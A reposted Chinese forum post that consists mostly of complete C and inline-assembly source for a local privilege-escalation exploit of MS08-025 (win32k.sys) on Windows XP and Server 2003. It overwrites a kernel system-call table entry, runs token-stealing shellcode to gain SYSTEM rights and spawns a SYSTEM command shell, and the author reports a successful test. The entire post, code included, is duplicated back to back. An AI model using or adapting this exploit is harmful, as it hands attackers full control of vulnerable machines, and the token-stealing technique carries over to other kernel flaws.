MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
以下消息來自幻影論壇[Ph4nt0m]郵件組: http://hi.baidu.com/vessial/blog/item/4ae4291b46f8e91c8718bfc2.html
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一種利用方式,通過覆蓋SSDT表NtVdmControl的地址進行shellcode的執行
#include <stdio.h>
#include <windows.h>
/* NTSTATUS is not declared by <windows.h>; the native API prototypes below use it. */
typedef LONG NTSTATUS;
/* Native NtAllocateVirtualMemory prototype. The function is not exported by the
 * Win32 headers, so InitTrampoline resolves it from ntdll.dll at run time. */
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,
                                      PVOID            *BaseAddress,
                                      ULONG                ZeroBits,
                                      PULONG           RegionSize,
                                      ULONG                AllocationType,
                                      ULONG                Protect );
/* ZwVdmControl prototype (two stdcall arguments); the user-mode stub is
 * resolved from ntdll.dll in GetFunction and called once from main. */
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
/* Report msg together with the calling thread's last Win32 error code (hex)
 * on stdout, then terminate the process with exit code 0. Never returns. */
void ErrorQuit(char *msg)
{
    DWORD last_error = GetLastError();
    fprintf(stdout, "%s:%x\n", msg, last_error);
    ExitProcess(0);
}
/* Filled by GetFunction; main calls through it after the SSDT slot has been rewritten. */
ZWVDMCONTROL    ZwVdmControl=NULL;
/* Filled by GetVersionEx in main; ShellCode reads dwMinorVersion to choose between
 * its XP (5.1) and 2003 (5.2) offset sets. */
OSVERSIONINFOEX OsVersionInfo;
/*
 * Kernel-mode payload reached through the rewritten NtVdmControl SSDT slot
 * (see main). Declared naked so the compiler emits no prologue/epilogue; the
 * `ret 8` at the end of each branch pops the two stdcall arguments of the
 * ZWVDMCONTROL prototype itself.
 *
 * One of two hard-coded offset sets is chosen on OsVersionInfo.dwMinorVersion
 * (1 = XP, 2 = Server 2003). Per the original author's comments each branch
 * locates the current process object through the KPCR, follows the link at a
 * fixed offset and subtracts that same offset to get back to the containing
 * object (looks like a LIST_ENTRY walk), stops when the field the author labels
 * as the process id equals 4 (System), and copies that process's token pointer
 * over the current process's token pointer. None of the offsets are validated
 * against the running kernel; on any other build they dereference arbitrary
 * kernel addresses.
 *
 * NOTE(review): the C `if` tests read the user-mode global OsVersionInfo from
 * kernel mode, which only works while the calling process's address space is
 * current (a direct system call from main). When dwMinorVersion is neither 1
 * nor 2 no branch executes and, the function being naked, control appears to
 * run off its end — main's dwMajorVersion check is the only guard visible here.
 */
_declspec(naked) int ShellCode()
{
    if ( OsVersionInfo.dwMinorVersion == 1 ) {
        __asm {
            nop
            nop
            nop
            nop
            nop
            nop
            mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
            Mov eax,[eax]
            mov esi,[eax+0x220] // esi = current process object (author's XP offset)
            mov eax,esi
searchXp:
            mov eax,[eax+0x88]  // follow link at +0x88 ...
            sub eax,0x88        // ... back to the containing process object
            mov edx,[eax+0x84]
            cmp edx,0x4 // Find System Process (field at +0x84 == 4)
            jne searchXp
            mov eax,[eax+0xc8] // eax = token of the System process
            mov [esi+0xc8],eax // overwrite the current process's token with it
            ret 8
        }
    }
    if ( OsVersionInfo.dwMinorVersion == 2 ) {
        __asm {
            nop
            nop
            nop
            nop
            nop
            nop
            mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
            Mov eax,[eax]
            mov esi,[eax+0x220] // esi = current process object (author's 2003 offset)
            mov eax,esi
search2003:
            mov eax,[eax+0x98]  // same walk as above with the 2003 offsets
            sub eax,0x98
            mov edx,[eax+0x94]
            cmp edx,0x4 // Find System Process (field at +0x94 == 4)
            jne search2003
            mov eax,[eax+0xd8] // eax = token of the System process
            mov [esi+0xd8],eax // overwrite the current process's token with it
            ret 8
        }
    }
}
/*
 * Map page 0 of the current process and place a 6-byte `push <ShellCode>; ret`
 * stub there, so that a kernel-mode call landing on address 0 (through the
 * rewritten SSDT slot, see main) transfers control to ShellCode.
 *
 * addr starts at 3; presumably the native allocator rounds the requested base
 * down to page 0 — the check below treats any other resulting address as a
 * failure. The region is requested RWX and is never released.
 *
 * NOTE(review): exit() is used without <stdlib.h>, relying on <windows.h> to
 * pull it in. Every failure path exits with status 0, indistinguishable from
 * success to a caller.
 */
void InitTrampoline()
{
    PNTALLOCATE NtAllocateVirtualMemory;
    LPVOID       addr = (LPVOID)3;      /* expected to come back as NULL (page 0) */
    DWORD       dwShellSize=0x1000;     /* one page */
    unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0  (imm32 is patched below)
                               "\xc3";               // retn
    NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");
    if( !NtAllocateVirtualMemory )
        exit(0);
    NtAllocateVirtualMemory( (HANDLE)-1,              /* current process */
                             &addr,
                             0,
                             &dwShellSize,
                             MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                             PAGE_EXECUTE_READWRITE );
    if( (PULONG)addr )   /* non-NULL: the region did not land on page 0 */
    {
        printf("\n[++] Error Allocating memory\n");
        exit(0);
    }
    *(PULONG*)(trampoline+1)=(PULONG)ShellCode;    /* patch the push immediate with ShellCode's address */
    memcpy(NULL,trampoline,sizeof(trampoline)-1);  /* copy the stub to page 0, without the string terminator */
}
/* Print the banner and reference links to stdout. Always returns 1. */
int Callback_Overview()
{
    static const char *const banner_lines[] = {
        "\n",
        "=====================================================================?? \n",
        "\t\tMicrosoft Windows XP SP2 - MS08-025 -?????? \n",
        "\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit?? \n",
        "=====================================================================?? \n",
        "+ References:\n",
        " [url]http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx[/url]\n",
        " [url]http://hi.baidu.com/vessial[/url]\n\n",
    };
    size_t line_count = sizeof banner_lines / sizeof banner_lines[0];
    size_t idx;
    for (idx = 0; idx < line_count; idx++) {
        fputs(banner_lines[idx], stdout);
    }
    return 1;
}
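/*
 * Resolve the user-mode ZwVdmControl stub from ntdll.dll into the global
 * ZwVdmControl. Calls ErrorQuit (which terminates the process) if ntdll.dll
 * cannot be loaded or the export is missing.
 *
 * NOTE(review): FreeLibrary is called before main uses the pointer; this works
 * only because ntdll.dll is already mapped in every process and is not
 * unloaded by the reference drop — confirm if this is ever reused elsewhere.
 */
void GetFunction()
{
    HMODULE hNtdll = LoadLibrary("ntdll.dll");   /* HMODULE matches LoadLibrary's return type */
    if(hNtdll == NULL)
        ErrorQuit("LoadLibrary failed.\n");

    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
    if(ZwVdmControl == NULL)
        ErrorQuit("GetProcAddress failed.\n");

    FreeLibrary(hNtdll);
}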
/*
 * Entry point: print the banner, resolve ZwVdmControl, require an NT 5.x
 * kernel, map the page-0 trampoline, rewrite the NtVdmControl SSDT slot via
 * the win32k WM_GETTEXT flaw (MS08-025), call ZwVdmControl so the kernel runs
 * ShellCode, then spawn cmd.exe.
 *
 * NOTE(review): PntVdmControl is a hard-coded kernel address; the commented
 * alternative above it shows it differs between builds, and nothing here
 * checks it against the running kernel, so a wrong value corrupts other kernel
 * memory instead. Assigning an integer to char* without a cast is a
 * constraint violation that only permissive compilers accept. CreateProcess's
 * result is unchecked, the handles returned in pi are never closed, and
 * argc/argv are unused.
 */
int main(int argc, char **argv)
{
    //PULONG   PntVdmControl=0x805F0DB0;
    char*   PntVdmControl=0x80502460; // author's note: read from *(PULONG)KeServiceDescriptorTable + 0x10c*4 (SSDT slot of NtVdmControl)

    STARTUPINFOA                stStartup;
    PROCESS_INFORMATION            pi;
    Callback_Overview();
    GetFunction();
    RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
    OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
    GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
    if ( OsVersionInfo.dwMajorVersion != 5 ) {   /* ShellCode only carries offsets for 5.1 and 5.2 */
        printf( "Not NT5 system\n" );
        ExitProcess( 0 );
    }
    //Get Operating System Version

    InitTrampoline();
    /* Two WM_GETTEXT sends with a kernel-mode pointer as the output buffer (the
     * MS08-025 flaw); offsets 0 and +2 together cover the 4-byte SSDT slot.
     * What the kernel writes there is not visible in this file — presumably
     * bytes that leave the slot pointing at page 0, where the trampoline sits. */
    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
    printf("\n[+] Executing Shellcode...\n");
    ZwVdmControl(0, NULL);   /* dispatches through the rewritten slot into ShellCode */
    GetStartupInfo( &stStartup );
    CreateProcess( NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        NULL,
        NULL,
        NULL,
        &stStartup,
        &pi );   // author's note: the cmd.exe created here runs with SYSTEM rights

    printf("[+] Exiting...\n");
    return TRUE;
}
我在XP測試成功,下面的第一個cmd是SYSTEM權限,這是我們提權后的,另一個cmd是test權限
歡迎轉載,但希望大家注明出處和保留其完整性,謝謝:)
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一種利用方式,通過覆蓋SSDT表NtVdmControl的地址進行shellcode的執行
#include <stdio.h>
#include <windows.h>
/* NTSTATUS is not declared by <windows.h>; the native API prototypes below use it. */
typedef LONG NTSTATUS;
/* Native NtAllocateVirtualMemory prototype. The function is not exported by the
 * Win32 headers, so InitTrampoline resolves it from ntdll.dll at run time. */
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,
                                      PVOID            *BaseAddress,
                                      ULONG                ZeroBits,
                                      PULONG           RegionSize,
                                      ULONG                AllocationType,
                                      ULONG                Protect );
/* ZwVdmControl prototype (two stdcall arguments); the user-mode stub is
 * resolved from ntdll.dll in GetFunction and called once from main. */
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
/* Report msg together with the calling thread's last Win32 error code (hex)
 * on stdout, then terminate the process with exit code 0. Never returns. */
void ErrorQuit(char *msg)
{
    DWORD last_error = GetLastError();
    fprintf(stdout, "%s:%x\n", msg, last_error);
    ExitProcess(0);
}
/* Filled by GetFunction; main calls through it after the SSDT slot has been rewritten. */
ZWVDMCONTROL    ZwVdmControl=NULL;
/* Filled by GetVersionEx in main; ShellCode reads dwMinorVersion to choose between
 * its XP (5.1) and 2003 (5.2) offset sets. */
OSVERSIONINFOEX OsVersionInfo;
/*
 * Kernel-mode payload reached through the rewritten NtVdmControl SSDT slot
 * (see main). Declared naked so the compiler emits no prologue/epilogue; the
 * `ret 8` at the end of each branch pops the two stdcall arguments of the
 * ZWVDMCONTROL prototype itself.
 *
 * One of two hard-coded offset sets is chosen on OsVersionInfo.dwMinorVersion
 * (1 = XP, 2 = Server 2003). Per the original author's comments each branch
 * locates the current process object through the KPCR, follows the link at a
 * fixed offset and subtracts that same offset to get back to the containing
 * object (looks like a LIST_ENTRY walk), stops when the field the author labels
 * as the process id equals 4 (System), and copies that process's token pointer
 * over the current process's token pointer. None of the offsets are validated
 * against the running kernel; on any other build they dereference arbitrary
 * kernel addresses.
 *
 * NOTE(review): the C `if` tests read the user-mode global OsVersionInfo from
 * kernel mode, which only works while the calling process's address space is
 * current (a direct system call from main). When dwMinorVersion is neither 1
 * nor 2 no branch executes and, the function being naked, control appears to
 * run off its end — main's dwMajorVersion check is the only guard visible here.
 */
_declspec(naked) int ShellCode()
{
    if ( OsVersionInfo.dwMinorVersion == 1 ) {
        __asm {
            nop
            nop
            nop
            nop
            nop
            nop
            mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
            Mov eax,[eax]
            mov esi,[eax+0x220] // esi = current process object (author's XP offset)
            mov eax,esi
searchXp:
            mov eax,[eax+0x88]  // follow link at +0x88 ...
            sub eax,0x88        // ... back to the containing process object
            mov edx,[eax+0x84]
            cmp edx,0x4 // Find System Process (field at +0x84 == 4)
            jne searchXp
            mov eax,[eax+0xc8] // eax = token of the System process
            mov [esi+0xc8],eax // overwrite the current process's token with it
            ret 8
        }
    }
    if ( OsVersionInfo.dwMinorVersion == 2 ) {
        __asm {
            nop
            nop
            nop
            nop
            nop
            nop
            mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
            Mov eax,[eax]
            mov esi,[eax+0x220] // esi = current process object (author's 2003 offset)
            mov eax,esi
search2003:
            mov eax,[eax+0x98]  // same walk as above with the 2003 offsets
            sub eax,0x98
            mov edx,[eax+0x94]
            cmp edx,0x4 // Find System Process (field at +0x94 == 4)
            jne search2003
            mov eax,[eax+0xd8] // eax = token of the System process
            mov [esi+0xd8],eax // overwrite the current process's token with it
            ret 8
        }
    }
}
/*
 * Map page 0 of the current process and place a 6-byte `push <ShellCode>; ret`
 * stub there, so that a kernel-mode call landing on address 0 (through the
 * rewritten SSDT slot, see main) transfers control to ShellCode.
 *
 * addr starts at 3; presumably the native allocator rounds the requested base
 * down to page 0 — the check below treats any other resulting address as a
 * failure. The region is requested RWX and is never released.
 *
 * NOTE(review): exit() is used without <stdlib.h>, relying on <windows.h> to
 * pull it in. Every failure path exits with status 0, indistinguishable from
 * success to a caller.
 */
void InitTrampoline()
{
    PNTALLOCATE NtAllocateVirtualMemory;
    LPVOID       addr = (LPVOID)3;      /* expected to come back as NULL (page 0) */
    DWORD       dwShellSize=0x1000;     /* one page */
    unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0  (imm32 is patched below)
                               "\xc3";               // retn
    NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");
    if( !NtAllocateVirtualMemory )
        exit(0);
    NtAllocateVirtualMemory( (HANDLE)-1,              /* current process */
                             &addr,
                             0,
                             &dwShellSize,
                             MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                             PAGE_EXECUTE_READWRITE );
    if( (PULONG)addr )   /* non-NULL: the region did not land on page 0 */
    {
        printf("\n[++] Error Allocating memory\n");
        exit(0);
    }
    *(PULONG*)(trampoline+1)=(PULONG)ShellCode;    /* patch the push immediate with ShellCode's address */
    memcpy(NULL,trampoline,sizeof(trampoline)-1);  /* copy the stub to page 0, without the string terminator */
}
/* Print the banner and reference links to stdout. Always returns 1. */
int Callback_Overview()
{
    static const char *const banner_lines[] = {
        "\n",
        "=====================================================================?? \n",
        "\t\tMicrosoft Windows XP SP2 - MS08-025 -?????? \n",
        "\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit?? \n",
        "=====================================================================?? \n",
        "+ References:\n",
        " [url]http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx[/url]\n",
        " [url]http://hi.baidu.com/vessial[/url]\n\n",
    };
    size_t line_count = sizeof banner_lines / sizeof banner_lines[0];
    size_t idx;
    for (idx = 0; idx < line_count; idx++) {
        fputs(banner_lines[idx], stdout);
    }
    return 1;
}
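/*
 * Resolve the user-mode ZwVdmControl stub from ntdll.dll into the global
 * ZwVdmControl. Calls ErrorQuit (which terminates the process) if ntdll.dll
 * cannot be loaded or the export is missing.
 *
 * NOTE(review): FreeLibrary is called before main uses the pointer; this works
 * only because ntdll.dll is already mapped in every process and is not
 * unloaded by the reference drop — confirm if this is ever reused elsewhere.
 */
void GetFunction()
{
    HMODULE hNtdll = LoadLibrary("ntdll.dll");   /* HMODULE matches LoadLibrary's return type */
    if(hNtdll == NULL)
        ErrorQuit("LoadLibrary failed.\n");

    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
    if(ZwVdmControl == NULL)
        ErrorQuit("GetProcAddress failed.\n");

    FreeLibrary(hNtdll);
}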
/*
 * Entry point: print the banner, resolve ZwVdmControl, require an NT 5.x
 * kernel, map the page-0 trampoline, rewrite the NtVdmControl SSDT slot via
 * the win32k WM_GETTEXT flaw (MS08-025), call ZwVdmControl so the kernel runs
 * ShellCode, then spawn cmd.exe.
 *
 * NOTE(review): PntVdmControl is a hard-coded kernel address; the commented
 * alternative above it shows it differs between builds, and nothing here
 * checks it against the running kernel, so a wrong value corrupts other kernel
 * memory instead. Assigning an integer to char* without a cast is a
 * constraint violation that only permissive compilers accept. CreateProcess's
 * result is unchecked, the handles returned in pi are never closed, and
 * argc/argv are unused.
 */
int main(int argc, char **argv)
{
    //PULONG   PntVdmControl=0x805F0DB0;
    char*   PntVdmControl=0x80502460; // author's note: read from *(PULONG)KeServiceDescriptorTable + 0x10c*4 (SSDT slot of NtVdmControl)

    STARTUPINFOA                stStartup;
    PROCESS_INFORMATION            pi;
    Callback_Overview();
    GetFunction();
    RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
    OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
    GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
    if ( OsVersionInfo.dwMajorVersion != 5 ) {   /* ShellCode only carries offsets for 5.1 and 5.2 */
        printf( "Not NT5 system\n" );
        ExitProcess( 0 );
    }
    //Get Operating System Version

    InitTrampoline();
    /* Two WM_GETTEXT sends with a kernel-mode pointer as the output buffer (the
     * MS08-025 flaw); offsets 0 and +2 together cover the 4-byte SSDT slot.
     * What the kernel writes there is not visible in this file — presumably
     * bytes that leave the slot pointing at page 0, where the trampoline sits. */
    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
    printf("\n[+] Executing Shellcode...\n");
    ZwVdmControl(0, NULL);   /* dispatches through the rewritten slot into ShellCode */
    GetStartupInfo( &stStartup );
    CreateProcess( NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        NULL,
        NULL,
        NULL,
        &stStartup,
        &pi );   // author's note: the cmd.exe created here runs with SYSTEM rights

    printf("[+] Exiting...\n");
    return TRUE;
}
我在XP測試成功,下面的第一個cmd是SYSTEM權限,這是我們提權后的,另一個cmd是test權限
轉載于:https://blog.51cto.com/netwalk/72233